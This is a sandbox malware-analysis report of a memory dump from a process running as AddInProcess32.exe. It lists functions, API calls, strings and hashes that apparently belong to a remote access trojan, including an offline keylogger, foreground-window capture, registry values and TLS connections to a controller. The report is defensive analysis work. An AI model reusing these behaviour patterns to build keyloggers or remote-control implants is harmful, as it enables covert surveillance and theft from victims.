Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: Sleep$ErrorLastLocalTime
String ID: | $%I64u$3.8.0 Pro$C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe$Connected | $Connecting | $Connection Error: $Connection Error: Unable to create socket$Disconnected$H"G$TLS Off$TLS On $`"G$hlight$name$!G
API String ID: 524882891-3814560791
Opcode ID: d601f5427b71b8bebfdd2cdf66b2cc0c2884c600b77c3aa14ce07a42c2b727ff
Instruction ID: 5f58eceae2704c6c0e376aa481a0c6a7ef3cc820e2c63ea8d389b44db61c6c97
Opcode Fuzzy Hash: d601f5427b71b8bebfdd2cdf66b2cc0c2884c600b77c3aa14ce07a42c2b727ff
Instruction Fuzzy Hash: 9F42AE31A001055BCB18F765DDA6AEEB3699F90308F1041BFF40A721E2EF785F868A5D

Function 004048A8 Relevance: 19.4, APIs: 4, Strings: 7, Instructions: 144
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

connect.WS2_32(?,?,?), ref: 004048C0
CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 004049E0
CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 004049EE
WSAGetLastError.WS2_32 ref: 00404A01

Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4

Strings

Connection Failed: , xrefs: 00404A23
TLS Authentication Failed, xrefs: 00404979
TLS Error 1, xrefs: 00404917
TLS Handshake... | , xrefs: 004048E4
Connection Refused, xrefs: 00404A56
TLS Error 2, xrefs: 00404935
TLS Error 3, xrefs: 004049B8

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: CreateEvent$ErrorLastLocalTimeconnect
String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
API String ID: 994465650-2151626615
Opcode ID: c47823f5d81b8fcd8c44ffe76240809f8c8049aa42c9dfd8a5859606e97f7b5b
Instruction ID: f1749a2af40dec866484330b2464a30bcc7489b9f615ba144f2b3c776ade1d80
Opcode Fuzzy Hash: c47823f5d81b8fcd8c44ffe76240809f8c8049aa42c9dfd8a5859606e97f7b5b
Instruction Fuzzy Hash: 37412AB5B406017BD608777A8E1B96E7625AB81304B50017FF901136D2EBBD9C2197DF

Function 00404E06 Relevance: 18.1, APIs: 12, Instructions: 65
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051A0,?,?,?,00405139), ref: 00404E18
SetEvent.KERNEL32(?,?,?,?,00000000,?,004051A0,?,?,?,00405139), ref: 00404E23
CloseHandle.KERNEL32(?,?,?,?,00000000,?,004051A0,?,?,?,00405139), ref: 00404E2C
closesocket.WS2_32(000000FF), ref: 00404E3A
WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051A0,?,?,?,00405139), ref: 00404E71
SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00404E82
WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404E89
SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404E9A
CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404E9F
CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404EA4
SetEvent.KERNEL32(?,?,?,?,00000000,?,004051A0,?,?,?,00405139), ref: 00404EB1
CloseHandle.KERNEL32(?,?,?,?,00000000,?,004051A0,?,?,?,00405139), ref: 00404EB6

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: CloseEventHandle$ObjectSingleWait$closesocket
String ID:
API String ID: 3658366068-0
Opcode ID: f707382b18fa39c0527187131c55234197c0fa46854763e90b09e39a9568e99a
Instruction ID: b890c501aeabc943cf782ca315c2c368517b908ebe77e8074f52597b82095e9a
Opcode Fuzzy Hash: f707382b18fa39c0527187131c55234197c0fa46854763e90b09e39a9568e99a
Instruction Fuzzy Hash: 1B212C71000B009FDB216B26DC49B17BBE5FF40326F114A2DE2E212AF1CB79E851DB58

Function 00409C1F Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 156
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__Init_thread_footer.LIBCMT ref: 00409C81
Sleep.KERNELBASE(000001F4), ref: 00409C8C
GetForegroundWindow.USER32 ref: 00409C92
GetWindowTextLengthW.USER32(00000000), ref: 00409C9B
GetWindowTextW.USER32(00000000,00000000,00000000), ref: 00409CCF
Sleep.KERNEL32(000003E8), ref: 00409D9D

Part of subcall function 0040962E: SetEvent.KERNEL32(?,?,?,0040A77B,?,?,?,?,?,00000000), ref: 0040965A

Strings

[, xrefs: 00409D37
], xrefs: 00409D31
{ User has been idle for , xrefs: 00409DCF
minutes }, xrefs: 00409DC3

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: Window$SleepText$EventForegroundInit_thread_footerLength
String ID: [${ User has been idle for $ minutes }$]
API String ID: 911427763-3954389425
Opcode ID: ee9b949ba4685117d773663a634f46785a27bf3fcb47f19481d588488b50e058
Instruction ID: 7a62ae1493acfbf190be1d0992f15f5c774c3bdccfea44e4f2dca48363f02a21
Opcode Fuzzy Hash: ee9b949ba4685117d773663a634f46785a27bf3fcb47f19481d588488b50e058
Instruction Fuzzy Hash: 7C5193716043405BD304FB61D855A6EB795AF84308F50093FF486A62E3DF7CAE45C69A

Function 0040C5ED Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 139
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLongPathNameW.KERNELBASE(00000000,?,00000208), ref: 0040C753

Strings

\SysWOW64, xrefs: 0040C6B9
Temp, xrefs: 0040C61F
AppData, xrefs: 0040C70A
WinDir, xrefs: 0040C654, 0040C676, 0040C6C8
UserProfile, xrefs: 0040C711
\system32, xrefs: 0040C667
SystemDrive, xrefs: 0040C64A
ProgramFiles, xrefs: 0040C727
ProgramData, xrefs: 0040C718

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: LongNamePath
String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
API String ID: 82841172-425784914
Opcode ID: f14e1be72a0680fbe39d61d121e9cc05331f57ab813806ef295ab36cc5fa3876
Instruction ID: e0747f7f0ded3e76473395fd4b63a7f1dfd4675be44f898a7a0c8db3d1efc66a
Opcode Fuzzy Hash: f14e1be72a0680fbe39d61d121e9cc05331f57ab813806ef295ab36cc5fa3876
Instruction Fuzzy Hash: EB4168315042419AC204FB62DC929EFB7E8AEA4759F10063FF541720E2EF799E49C99F

Function 0040971E Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 163
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00409738

Part of subcall function 0040966D: CreateFileW.KERNELBASE(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409745), ref: 004096A3
Part of subcall function 0040966D: GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409745), ref: 004096B2
Part of subcall function 0040966D: Sleep.KERNEL32(00002710,?,?,?,00409745), ref: 004096DF
Part of subcall function 0040966D: CloseHandle.KERNELBASE(00000000,?,?,?,00409745), ref: 004096E6

CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 00409774
GetFileAttributesW.KERNELBASE(00000000), ref: 00409785
SetFileAttributesW.KERNELBASE(00000000,00000080), ref: 0040979C
PathFileExistsW.KERNELBASE(00000000,00000000,00000000,00000012), ref: 00409816

Part of subcall function 0041A20F: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040983B), ref: 0041A228

SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00469654,?,00000000,00000000,00000000,00000000,00000000), ref: 0040991F

Strings

H"G, xrefs: 004097EF
H"G, xrefs: 004097FA

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
String ID: H"G$H"G
API String ID: 3795512280-1424798214
Opcode ID: d4054b3541c9de0bb886707d1330939cd573338eb007fed7dc332b33fd2e5bf0
Instruction ID: 85d6828eff9e87111454ffe40de9a07a949f8ec8799fb43d86416e8e02d17308
Opcode Fuzzy Hash: d4054b3541c9de0bb886707d1330939cd573338eb007fed7dc332b33fd2e5bf0
Instruction Fuzzy Hash: 9D513D712043015BCB14BB72C9A6ABF76999F90308F00453FB946B72E3DF7D9D09869A

Function 004192AE Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 61
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00419F23: GetCurrentProcess.KERNEL32(?,?,?,0040C663,WinDir,00000000,00000000), ref: 00419F34

Part of subcall function 00411F91: RegOpenKeyExA.KERNELBASE(80000002,00000400,00000000,00020019,?), ref: 00411FB5
Part of subcall function 00411F91: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 00411FD2
Part of subcall function 00411F91: RegCloseKey.KERNELBASE(?), ref: 00411FDD

StrToIntA.SHLWAPI(00000000,00469710,00000000,00000000,00000000,00471FFC,00000001,?,?,?,?,?,?,0040D6A0), ref: 00419327

Strings

ProductName, xrefs: 004192BD
SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 004192C2, 004192CC, 0041930D
CurrentBuildNumber, xrefs: 00419308
(32 bit), xrefs: 0041935A
(64 bit), xrefs: 00419353

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: CloseCurrentOpenProcessQueryValue
String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
API String ID: 1866151309-2070987746
Opcode ID: 0802035b950ed000d9a10129efeec30dbf5645d1e0bd6e921da0c017b2021ac7
Instruction ID: a9b62d1d1389f8d2b696bc63f2982e792167bed2dd8bed00043a633dd184e9c5
Opcode Fuzzy Hash: 0802035b950ed000d9a10129efeec30dbf5645d1e0bd6e921da0c017b2021ac7
Instruction Fuzzy Hash: E411E371A002456AC704B765CC67AAF761D8B54309F64053FF905A71E2FABC4D8282AA

Function 0040966D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58
sleepfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409745), ref: 004096A3
GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409745), ref: 004096B2
Sleep.KERNEL32(00002710,?,?,?,00409745), ref: 004096DF
CloseHandle.KERNELBASE(00000000,?,?,?,00409745), ref: 004096E6

Strings

h G, xrefs: 00409698

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleSizeSleep
String ID: h G
API String ID: 1958988193-3300504347
Opcode ID: 13e975a3868741cffac1d73112577800afb55aac81ce9bb8c63aa5aacad1b37c
Instruction ID: 1483d32ec36d41576822df3093d1b75ffc22edec2a146082987510034e162158
Opcode Fuzzy Hash: 13e975a3868741cffac1d73112577800afb55aac81ce9bb8c63aa5aacad1b37c
Instruction Fuzzy Hash: 24113D70201380ABD7316B749D99A2F3A9BB746304F44087EF281636D3C67D5C44C32E

Function 0041A17B Relevance: 7.6, APIs: 5, Instructions: 67
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000002,00000080,00000000,?,00000000,?,?,00000000,0041A29A,00000000,00000000,?), ref: 0041A1BA
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,004098DF,?,00000000,00000000), ref: 0041A1D7
CloseHandle.KERNEL32(00000000,?,004098DF,?,00000000,00000000), ref: 0041A1E3
WriteFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,004098DF,?,00000000,00000000), ref: 0041A1F4
CloseHandle.KERNELBASE(00000000,?,004098DF,?,00000000,00000000), ref: 0041A201

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: File$CloseHandle$CreatePointerWrite
String ID:
API String ID: 1852769593-0
Opcode ID: 900e91da6aef5ae1ef2d64e2906a14ebfc53969b27a9c650ee74425d8e4f4bd5
Instruction ID: 9d85e8900f1be3931a26f88ae5ac80d5e45035a8363d546858a313564ae31bc3
Opcode Fuzzy Hash: 900e91da6aef5ae1ef2d64e2906a14ebfc53969b27a9c650ee74425d8e4f4bd5
Instruction Fuzzy Hash: 0911C4712062147FE6105A249C88EFB779CEB46375F10076AF556C32D1C6698C95863B

Function 00409203 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNELBASE(00000000,00000000,00409305,?,00000000,00000000), ref: 0040928B
CreateThread.KERNELBASE(00000000,00000000,004092EF,?,00000000,00000000), ref: 0040929B
CreateThread.KERNELBASE(00000000,00000000,Function_00009311,?,00000000,00000000), ref: 004092A7

Part of subcall function 0040A0B0: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040A0BE
Part of subcall function 0040A0B0: wsprintfW.USER32 ref: 0040A13F

Strings

Offline Keylogger Started, xrefs: 00409228, 0040922F, 0040925C

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: CreateThread$LocalTimewsprintf
String ID: Offline Keylogger Started
API String ID: 465354869-4114347211
Opcode ID: 4f413bfeddc20b053a911010c7dd0c78c6d83759768fb02ef20824c4023f4b57
Instruction ID: c8e77f7b3f84bd49b91c3d3ae4e8ac846fef78eef7351f53fb2416b9cb49ddb0
Opcode Fuzzy Hash: 4f413bfeddc20b053a911010c7dd0c78c6d83759768fb02ef20824c4023f4b57
Instruction Fuzzy Hash: 3211A7A15003083ED210BB669DD6CBB7A5CDA8139CB40057FF845221C3EAB85D19C6FF

Function 0041215F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 38registryCOMMON

Download Yara Rule

APIs

RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 0041216E
RegSetValueExA.KERNELBASE(?,00464150,00000000,?,00000000,00000000,00472200,?,pth_unenc,0040E23B,00464150,3.8.0 Pro), ref: 00412196
RegCloseKey.KERNELBASE(?,?,pth_unenc,0040E23B,00464150,3.8.0 Pro), ref: 004121A1

Strings

pth_unenc, xrefs: 0041215F

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: CloseCreateValue
String ID: pth_unenc
API String ID: 1818849710-4028850238
Opcode ID: bb05d805405002c9ea24476e63677667bc427e1baa708286b474a2e763bb1422
Instruction ID: 4e2890e51e7d784523b6c6e9c9a916a8daaabc2f4381c7e0ff06ecafce147d70
Opcode Fuzzy Hash: bb05d805405002c9ea24476e63677667bc427e1baa708286b474a2e763bb1422
Instruction Fuzzy Hash: 5AF0F632100208BFCB00EFA0DD45DEE373CEF04751F104226BD09A61A2D7359E10DB94

Function 00411F34 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 37registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?), ref: 00411F54
RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,00000000,?,00472200), ref: 00411F72
RegCloseKey.KERNELBASE(?), ref: 00411F7D

Strings

pth_unenc, xrefs: 00411F34

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: CloseOpenQueryValue
String ID: pth_unenc
API String ID: 3677997916-4028850238
Opcode ID: 57758b6d0601c7ca4cdc37a1c8378ac71baf4d5830b0c502524eb489cf77768e
Instruction ID: 6ec0a72befc52f1c009cc632a5b728b25634ffaa8485c37bac66e7b8b5c78dc5
Opcode Fuzzy Hash: 57758b6d0601c7ca4cdc37a1c8378ac71baf4d5830b0c502524eb489cf77768e
Instruction Fuzzy Hash: 31F01D7694020CBFDF109FA09C45FEE7BBCEB04B11F1041A5BA04E6191D2359A54DB94

Function 00411F91 Relevance: 4.5, APIs: 3, Instructions: 44registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNELBASE(80000002,00000400,00000000,00020019,?), ref: 00411FB5
RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 00411FD2
RegCloseKey.KERNELBASE(?), ref: 00411FDD

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: CloseOpenQueryValue
String ID:
API String ID: 3677997916-0
Opcode ID: bd819641beb65f800504f4ea07b1b85b9b2ddc2993f1f77fdff934dbeb1127c7
Instruction ID: 7c5a36a74d232ee299d7294234303f181ef10811f7d8c913f13e4634b011a18e
Opcode Fuzzy Hash: bd819641beb65f800504f4ea07b1b85b9b2ddc2993f1f77fdff934dbeb1127c7
Instruction Fuzzy Hash: 2D01D676900218BBCB209B95DD08DEF7F7DDB84751F000166BB05A3150DB748E46D7B8

Function 00443649 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00433049,?,P@,004365E7,?,?,00000000,?,P@,0040C88A,00433049,?,?,?,?), ref: 0044367B

Strings

P@, xrefs: 0044364B

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID: P@
API String ID: 1279760036-676759640
Opcode ID: 0c61ffa0ec78c269e0422769366e0108c3b164e239eff4ad14a217a7d57edf52
Instruction ID: 99ef05a6bb91785527f59a1062444bc3c705daae6acf277761014d7f2c467fed
Opcode Fuzzy Hash: 0c61ffa0ec78c269e0422769366e0108c3b164e239eff4ad14a217a7d57edf52
Instruction Fuzzy Hash: 7EE0E52110162377F6312E635C0075B36489F41BA2F17412BFC8596780CB69CE0041AD

Function 00443697 Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 004436B8

Part of subcall function 00443649: RtlAllocateHeap.NTDLL(00000000,00433049,?,P@,004365E7,?,?,00000000,?,P@,0040C88A,00433049,?,?,?,?), ref: 0044367B

RtlReAllocateHeap.NTDLL(00000000,00000000,?,?,0000000F,00000000,00430CB7,00000000,0000000F,0042D6C1,?,?,0042F768,?,?,00000000), ref: 004436F4

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: AllocateHeap$_free
String ID:
API String ID: 1482568997-0
Opcode ID: 7a24a503362ce6b0d8a8277bf03f94e4b882e5a9fcc2e03a2aeb4a458e56015f
Instruction ID: 1ca59af56198d509cf9e402e21e9c8c5a276ccba14ddaf673a50935c82dc1d11
Opcode Fuzzy Hash: 7a24a503362ce6b0d8a8277bf03f94e4b882e5a9fcc2e03a2aeb4a458e56015f
Instruction Fuzzy Hash: F0F062322012177AFB312E27AC05A6B37599F81F77F23412BF954A6391EA3CDA01456E

Function 0040480D Relevance: 3.0, APIs: 2, Instructions: 40networkCOMMON

Download Yara Rule

APIs

socket.WS2_32(?,00000001,00000006), ref: 00404832
CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,004052EB,?,?,00000000,00000000,?,?,00000000,004051E8,?,00000000), ref: 0040486E

Part of subcall function 0040487E: WSAStartup.WS2_32(00000202,00000000), ref: 00404893

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: CreateEventStartupsocket
String ID:
API String ID: 1953588214-0
Opcode ID: d0890d6b9dbf7aa10081a8f0c48d4e4836abc09c18ec6d90db35a2a0ad95277d
Instruction ID: 6a7ca6a32121b389846a28cffc2ecd87dee0ffbb862a0929ff73aad7f5bc5f79
Opcode Fuzzy Hash: d0890d6b9dbf7aa10081a8f0c48d4e4836abc09c18ec6d90db35a2a0ad95277d
Instruction Fuzzy Hash: 3301B1B14087809FD7349F28B8446877FE0AB15300F048D6EF1CA93BA1D3B1A444CB18

Function 0040163E Relevance: 3.0, APIs: 2, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f210c679e2b780eded3ea4ef50917041f60fa4d2abe52b8749c2b449606446f0
Instruction ID: 17b6f17919427e724365abd55f1db4a6b8769e1fa76fb76fe63095c9ff18be87
Opcode Fuzzy Hash: f210c679e2b780eded3ea4ef50917041f60fa4d2abe52b8749c2b449606446f0
Instruction Fuzzy Hash: 09F0ECB02042015BCB1C9B34CD5062B379A4BA8365F289F7FF02BD61E0C73AC895860D

Function 0041393F Relevance: 3.0, APIs: 2, Instructions: 21networkCOMMON

Download Yara Rule

APIs

getaddrinfo.WS2_32(00000000,00000000,00000000,0046FACC,00471FFC,00000000,00413BDE,00000000,00000001), ref: 00413961
WSASetLastError.WS2_32(00000000), ref: 00413966

Part of subcall function 004137DC: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0041382B
Part of subcall function 004137DC: LoadLibraryA.KERNEL32(?), ref: 0041386D
Part of subcall function 004137DC: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 0041388D
Part of subcall function 004137DC: FreeLibrary.KERNEL32(00000000), ref: 00413894
Part of subcall function 004137DC: LoadLibraryA.KERNEL32(?), ref: 004138CC
Part of subcall function 004137DC: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 004138DE
Part of subcall function 004137DC: FreeLibrary.KERNEL32(00000000), ref: 004138E5
Part of subcall function 004137DC: GetProcAddress.KERNEL32(00000000,?), ref: 004138F4

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: Library$AddressProc$FreeLoad$DirectoryErrorLastSystemgetaddrinfo
String ID:
API String ID: 1170566393-0
Opcode ID: 446cd1a75fef60d2dbb194a89db87c245147481f39af62d49fc0052fbde1f552
Instruction ID: 06324504dbe977c901379e35fefec32dabdef79d564ed510376fbe661015aea4
Opcode Fuzzy Hash: 446cd1a75fef60d2dbb194a89db87c245147481f39af62d49fc0052fbde1f552
Instruction Fuzzy Hash: FFD02B723001213B9310AB5DAC01FB76B9CDFD27227050037F409C3110D7948D4147AD

Function 00408F1F Relevance: 1.6, APIs: 1, Instructions: 80COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00408F39

Part of subcall function 00409203: CreateThread.KERNELBASE(00000000,00000000,00409305,?,00000000,00000000), ref: 0040928B
Part of subcall function 00409203: CreateThread.KERNELBASE(00000000,00000000,004092EF,?,00000000,00000000), ref: 0040929B
Part of subcall function 00409203: CreateThread.KERNELBASE(00000000,00000000,Function_00009311,?,00000000,00000000), ref: 004092A7

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: CreateThread$_wcslen
String ID:
API String ID: 1119755333-0
Opcode ID: a4cf6233b645aec8069e012e89874406b6158c7e2554cf9ff51d1662effb5250
Instruction ID: bde1965b6f08766bd400bb9d626b3f4fd5e121562736213e95ba31f4244dc5e2
Opcode Fuzzy Hash: a4cf6233b645aec8069e012e89874406b6158c7e2554cf9ff51d1662effb5250
Instruction Fuzzy Hash: 86218F719040899ACB09FFB5DD528EE7BB5AE51308F00003FF941722E2DE785A49DA99

Function 0044D2B4 Relevance: 1.6, APIs: 1, Instructions: 52COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00443005: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,004457DA,00000001,00000364,?,00000000,00000000,00439A11,00000000,00000000,?,00439A95,00000000), ref: 00443046

_free.LIBCMT ref: 0044D320

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: 3263e86e01d89d9b2c949f26067d012f8e3513974416179447fc4125dbbefc63
Instruction ID: 6435cefd8bbe106a332e767b8e47ea9a619cae55f612b2c95de9f127ac4edb1d
Opcode Fuzzy Hash: 3263e86e01d89d9b2c949f26067d012f8e3513974416179447fc4125dbbefc63
Instruction Fuzzy Hash: 260149736003056BF321CF69D885E5AFBE8FB89374F25061EE585832C0EA34A905C738

Function 00443005 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,004457DA,00000001,00000364,?,00000000,00000000,00439A11,00000000,00000000,?,00439A95,00000000), ref: 00443046

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 8a82d2413be822b6e30d7260cb8c0ab5a5cb0f0d071671a377993aa538de489b
Instruction ID: 6f1ff5b5ffdcc79539d97ae047dfd157567b1d653d04e58146e0509186e3fe0c
Opcode Fuzzy Hash: 8a82d2413be822b6e30d7260cb8c0ab5a5cb0f0d071671a377993aa538de489b
Instruction Fuzzy Hash: A0F0B43220022466FB319E229C01A5B3749AF42FA2F158227BC04E62C9CA78DE1182AD

Function 0040487E Relevance: 1.5, APIs: 1, Instructions: 15networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32(00000202,00000000), ref: 00404893

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: Startup
String ID:
API String ID: 724789610-0
